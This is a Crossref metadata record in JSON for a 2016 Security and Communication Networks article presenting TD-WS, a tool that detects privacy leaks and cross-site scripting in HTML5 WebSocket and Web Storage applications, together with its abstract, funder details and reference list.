{"status":"ok","message-type":"work","message-version":"1.0.0","message":{"indexed":{"date-parts":[[2024,8,8]],"date-time":"2024-08-08T11:50:57Z","timestamp":1723117857602},"reference-count":39,"publisher":"Wiley","issue":"18","license":[{"start":{"date-parts":[[2016,11,27]],"date-time":"2016-11-27T00:00:00Z","timestamp":1480204800000},"content-version":"vor","delay-in-days":0,"URL":"http:\/\/onlinelibrary.wiley.com\/termsAndConditions#vor"}],"funder":[{"DOI":"10.13039\/501100001809","name":"National Natural Science Foundation of China","doi-asserted-by":"publisher","award":["61672543","61173169"],"award-info":[{"award-number":["61672543","61173169"]}],"id":[{"id":"10.13039\/501100001809","id-type":"DOI","asserted-by":"publisher"}]}],"content-domain":{"domain":[],"crossmark-restriction":false},"short-container-title":["Security Comm Networks"],"published-print":{"date-parts":[[2016,12]]},"abstract":"Abstract<\/jats:title>The new features of HTML5 greatly increase the convenience for both web developers and users, but they also bring new security threats. Although the web\u2010security community has started to analyze the security threats brought by HTML5, little has been performed to address the security threats for the client\u2010side applications. This paper studies security issues of two popular client\u2010side primitives: WebSocket and Web Storage. The security threats concerned in this paper are private information stealth through WebSocket and cross\u2010site scripting vulnerabilities caused by lacking of sanitization for WebSocket messages and Web Storage data. We analyze the unsafe data flows of these two HTML5 primitives in detail. Based on that, we present a threat detection tool called TD\u2010WS, which can automatically detect the privacy leaks and the cross\u2010site scripting vulnerabilities in WebSocket and Web Storage applications. The results show that TD\u2010WS effectively detects the security threats of WebSocket and Web Storage applications. Copyright \u00a9 2016 John Wiley & Sons, Ltd.<\/jats:p>","DOI":"10.1002\/sec.1708","type":"journal-article","created":{"date-parts":[[2016,11,28]],"date-time":"2016-11-28T02:46:45Z","timestamp":1480301205000},"page":"5432-5443","source":"Crossref","is-referenced-by-count":4,"title":["TD\u2010WS: a threat detection tool of WebSocket and Web Storage in HTML5 websites"],"prefix":"10.1002","volume":"9","author":[{"given":"Junyang","family":"Bai","sequence":"first","affiliation":[{"name":"School of Information Science and Engineering Central South University Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Weiping","family":"Wang","sequence":"additional","affiliation":[{"name":"School of Information Science and Engineering Central South University Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Mingming","family":"Lu","sequence":"additional","affiliation":[{"name":"School of Information Science and Engineering Central South University Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Haodong","family":"Wang","sequence":"additional","affiliation":[{"name":"Department of Electrical Engineering and Computer Science Cleveland State University Cleveland 44115 OH U.S.A."}],"role":[{"role":"author","vocabulary":"crossref"}]},{"given":"Jianxin","family":"Wang","sequence":"additional","affiliation":[{"name":"School of Information Science and Engineering Central South University Changsha Hunan 410083 China"}],"role":[{"role":"author","vocabulary":"crossref"}]}],"member":"311","published-online":{"date-parts":[[2016,11,27]]},"reference":[{"key":"e_1_2_9_2_1","doi-asserted-by":"crossref","unstructured":"HeiderichM NiemietzM SchusterF HolzT SchwenkJ.Scriptless attacks: stealing the pie without touching the sill.Proceedings of ACM Conference on Computer and Communications Security (CCS) Raleigh NC USA 2012;760\u2013771.","DOI":"10.1145\/2382196.2382276"},{"key":"e_1_2_9_3_1","doi-asserted-by":"crossref","unstructured":"KotcherR PeiY JumdeP JacksonC.Cross\u2010origin pixel stealing: timing attacks using CSS filters.Proceedings of ACM Conference on Computer and Communications Security (CCS) Berlin Germany 2013;1055\u20131062.","DOI":"10.1145\/2508859.2516712"},{"key":"e_1_2_9_4_1","unstructured":"SchneiderC.Cross\u2010site WebSocket hijacking. Available from:http\/\/www.christian-schneider.net\/ CrossSiteWebSocketHijacking.html [accessed on October 2015]."},{"key":"e_1_2_9_5_1","unstructured":"TriveroA.Abusing HTML 5 structured client\u2010side storage. Available from:http:\/\/packetstorm.orionhosting.co. uk\/papers\/general\/html5whitepaper.pdf [accessed on October 2015]."},{"key":"e_1_2_9_6_1","unstructured":"HannaS ShinR AkhaweD BoehmA SaxenaP SongD.The emperors new APIs: on the (in) secure usage of new client\u2010side primitives.Proceedings of Workshop on Web 2.0 Security and Privacy (W2SP) Oakland CA USA 2010."},{"key":"e_1_2_9_7_1","unstructured":"SonS ShmatikovV.The postman always rings twice: attacking and defending postMessage in HTML5 websites.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 2013."},{"key":"e_1_2_9_8_1","doi-asserted-by":"crossref","unstructured":"TianY LiuYC BhosaleA HuangLS TagueP JacksonC.All your screens are belong to us: attacks exploiting the HTML5 screen sharing API.Proceedings of IEEE Symposium on Security and Privacy (S&P) San Jose CA USA 2014;34\u201348.","DOI":"10.1109\/SP.2014.10"},{"key":"e_1_2_9_9_1","doi-asserted-by":"crossref","unstructured":"LeeS KimH KimJ.Identifying cross\u2010origin resource status using application cache.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 2015.","DOI":"10.14722\/ndss.2015.23027"},{"key":"e_1_2_9_10_1","doi-asserted-by":"crossref","unstructured":"JovanovicN KruegelC KirdaE..Pixy: A static analysis tool for detecting web application vulnerabilities.Proceedings of IEEE Symposium on Security and Privacy (S&P) Oakland CA USA 2006;258\u2013263.","DOI":"10.1109\/SP.2006.29"},{"key":"e_1_2_9_11_1","unstructured":"VogtP NentwichF JovanovicN KirdaE KruegelC VignaG.Cross site scripting prevention with dynamic data tainting and static analysis.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 2007."},{"key":"e_1_2_9_12_1","doi-asserted-by":"publisher","DOI":"10.1145\/1273442.1250739"},{"key":"e_1_2_9_13_1","doi-asserted-by":"crossref","unstructured":"WassermannG SuZ.Static detection of cross\u2010site scripting vulnerabilities.Proceedings of ACM\/IEEE International Conference on Software Engineering (ICSE) Leipzig Germany 2008;171\u2013180.","DOI":"10.1145\/1368088.1368112"},{"key":"e_1_2_9_14_1","doi-asserted-by":"crossref","unstructured":"BalzarottiD CovaM FelmetsgerV JovanovicN KirdaE KruegelC VignaG.Saner: Composing static and dynamic analysis to validate sanitization in web applications.Proceedings of IEEE Symposium on Security and Privacy (S&P) Oakland CA USA 2008;387\u2013401.","DOI":"10.1109\/SP.2008.22"},{"key":"e_1_2_9_15_1","unstructured":"FetteI MelnikovA.The WebSocket Protocol. Available from:http:\/\/tools.ietf.org\/html\/rfc6455 [accessed on September 2015]."},{"key":"e_1_2_9_16_1","unstructured":"AnneVK AryehG AlexR RobinB.W3C DOM4. Available from:https:\/\/www.w3.org\/TR\/dom\/ [accessed on February 2016.]"},{"key":"e_1_2_9_17_1","unstructured":"IanH.Web Storage. Available from:https:\/\/www.w3.org\/TR\/webstorage\/ [accessed on September 2015]."},{"key":"e_1_2_9_18_1","doi-asserted-by":"publisher","DOI":"10.1145\/1543135.1542483"},{"key":"e_1_2_9_19_1","unstructured":"SaxenaP HannaS PoosankamP SongD.FLAX: Systematic discovery of client\u2010side validation vulnerabilities in rich web applications.Proceedings of Annual Symposium on Network & Distributed System Security (NDSS) San Diego CA USA 2010."},{"key":"e_1_2_9_20_1","unstructured":"Di PaolaS.DominatorPro: securing next generation of web applications. Avialable from:https:\/\/dominator. mindedsecurity.com [accessed on September 2015.]"},{"key":"e_1_2_9_21_1","doi-asserted-by":"crossref","unstructured":"LekiesS StockB JohnsM.25 million flows later: large\u2010scale detection of DOM\u2010based XSS.Proceedings of ACM Conference on Computer and Communications Security (CCS) Berlin Germany 2013;1193\u20131204.","DOI":"10.1145\/2508859.2516703"},{"key":"e_1_2_9_22_1","unstructured":"WangW BaiJ ZhangY WangJ.Dynamic data tainting on JavaScript based on code rewritten.Proceedings of Conference on Vulnerability Analysis and Risk Assessment (VARA) Beijing China 2015."},{"key":"e_1_2_9_23_1","doi-asserted-by":"publisher","DOI":"10.1109\/JSAC.2002.806121"},{"key":"e_1_2_9_24_1","doi-asserted-by":"crossref","unstructured":"ClauseJ LiW OrsoA.Dytan: a generic dynamic taint analysis framework.Proceedings of International Symposium on Software Testing and Analysis (ISSTA) London UK 2007;196\u2013206.","DOI":"10.1145\/1273463.1273490"},{"key":"e_1_2_9_25_1","doi-asserted-by":"publisher","DOI":"10.1145\/2619091"},{"key":"e_1_2_9_26_1","unstructured":"NewsomeJ SongD.Dynamic taint analysis for automatic detection analysis and signature generation of exploits on commodity software 2005."},{"key":"e_1_2_9_27_1","doi-asserted-by":"crossref","unstructured":"QinF WangC LiZ KimHS ZhouY WuY.Lift: a low\u2010overhead practical information flow tracking system for detecting security attacks.Proceedings of Annual IEEE\/ACM International Symposium on Microarchitecture (MICRO) Barcelona Spain 2006;135\u2013148.","DOI":"10.1109\/MICRO.2006.29"},{"key":"e_1_2_9_28_1","doi-asserted-by":"crossref","unstructured":"YinH SongD EgeleM KruegelC KirdaE.Panorama: capturing system\u2010wide information flow for malware detection and analysis.Proceedings of ACM Conference on Computer and Communications Security (CCS) Alexandria VA USA 2007;116\u2013127.","DOI":"10.1145\/1315245.1315261"},{"key":"e_1_2_9_29_1","doi-asserted-by":"crossref","unstructured":"JinX HuX YingK DuW YinH PeriGN.Code injection attacks on HTML5\u2010based mobile apps: characterization detection and mitigation.Proceedings of ACM Conference on Computer and Communications Security (CCS) Scottsdale AZ USA 2014;66\u201377.","DOI":"10.1145\/2660267.2660275"},{"key":"e_1_2_9_30_1","unstructured":"DeFreezD ShastryB ChenH SeifertJP.A first look at Firefox OS security.Proceedings of Workshop on Mobile Security Technologies (MoST) San Jose CA USA 2014."},{"key":"e_1_2_9_31_1","unstructured":"GuarnieriS LivshitsVB.GATEKEEPER: mostly static enforcement of security and reliability policies for JavaScript Code.Proceedings of USENIX Security Symposium Montreal Canada 2009;78\u201385."},{"key":"e_1_2_9_32_1","doi-asserted-by":"crossref","unstructured":"GuarnieriS PistoiaM TrippO DolbyJ TeilhetS BergR.Saving the world wide web from vulnerable JavaScript.Proceedings of International Symposium on Software Testing and Analysis (ISSTA) Toronto ON Canada 2011;177\u2013187.","DOI":"10.1145\/2001420.2001442"},{"key":"e_1_2_9_33_1","doi-asserted-by":"crossref","unstructured":"LiZ ZhangK WangX.Mash\u2010IF: practical information\u2010flow control within client\u2010side mashups.Proceedings of IEEE\/IFIP International Conference on Dependable Systems and Networks (DSN) Chicago IL USA 2010;251\u2013260.","DOI":"10.1109\/DSN.2010.5544312"},{"key":"e_1_2_9_34_1","doi-asserted-by":"crossref","unstructured":"DevrieseD PiessensF.Noninterference through secure multi\u2010execution.Proceedings of IEEE Symposium on Security and Privacy (S&P) Oakland CA USA 2010;109\u2013124.","DOI":"10.1109\/SP.2010.15"},{"key":"e_1_2_9_35_1","doi-asserted-by":"publisher","DOI":"10.1145\/2103621.2103677"},{"key":"e_1_2_9_36_1","doi-asserted-by":"crossref","unstructured":"HedinD SabelfeldA.Information\u2010flow security for a core of JavaScript.Proceedings of IEEE Symposium on Computer Security Foundations (CSF) Cambridge MA USA 2012;3\u201318.","DOI":"10.1109\/CSF.2012.19"},{"key":"e_1_2_9_37_1","first-page":"505","article-title":"Isolating JavaScript with filters, rewriting, and wrappers","author":"Maffeis S","year":"2009","journal-title":"Computer Security"},{"key":"e_1_2_9_38_1","doi-asserted-by":"crossref","unstructured":"AkhaweD LiF HeW SaxenaP SongD.Data\u2010confined html5 applications.Proceedings of European Symposium on Research in Computer Security (ESORICS) RHUL Egham U.K. 2013;736\u2013754.","DOI":"10.1007\/978-3-642-40203-6_41"},{"key":"e_1_2_9_39_1","unstructured":"AkhaweD SaxenaP SongD.Privilege separation in HTML5 applications.Proceedings of USENIX Security Symposium Bellevue WA USA 2012;429\u2013444."},{"key":"e_1_2_9_40_1","doi-asserted-by":"crossref","unstructured":"JinX WangL LuoT DuW.Fine\u2010grained access control for HTML5\u2010based mobile applications in android.Proceedings of Information Security Conference (ISC) Dallas TX USA 2013;309\u2013318.","DOI":"10.1007\/978-3-319-27659-5_22"}],"container-title":["Security and Communication Networks"],"original-title":[],"language":"en","link":[{"URL":"https:\/\/api.wiley.com\/onlinelibrary\/tdm\/v1\/articles\/10.1002%2Fsec.1708","content-type":"application\/pdf","content-version":"vor","intended-application":"text-mining"},{"URL":"https:\/\/api.wiley.com\/onlinelibrary\/tdm\/v1\/articles\/10.1002%2Fsec.1708","content-type":"unspecified","content-version":"vor","intended-application":"text-mining"},{"URL":"https:\/\/onlinelibrary.wiley.com\/doi\/pdf\/10.1002\/sec.1708","content-type":"unspecified","content-version":"vor","intended-application":"similarity-checking"}],"deposited":{"date-parts":[[2023,9,2]],"date-time":"2023-09-02T19:46:10Z","timestamp":1693683970000},"score":1,"resource":{"primary":{"URL":"https:\/\/onlinelibrary.wiley.com\/doi\/10.1002\/sec.1708"}},"subtitle":[],"short-title":[],"issued":{"date-parts":[[2016,11,27]]},"references-count":39,"journal-issue":{"issue":"18","published-print":{"date-parts":[[2016,12]]}},"alternative-id":["10.1002\/sec.1708"],"URL":"https:\/\/doi.org\/10.1002\/sec.1708","archive":["Portico"],"relation":{},"ISSN":["1939-0114","1939-0122"],"issn-type":[{"value":"1939-0114","type":"print"},{"value":"1939-0122","type":"electronic"}],"subject":[],"published":{"date-parts":[[2016,11,27]]}}}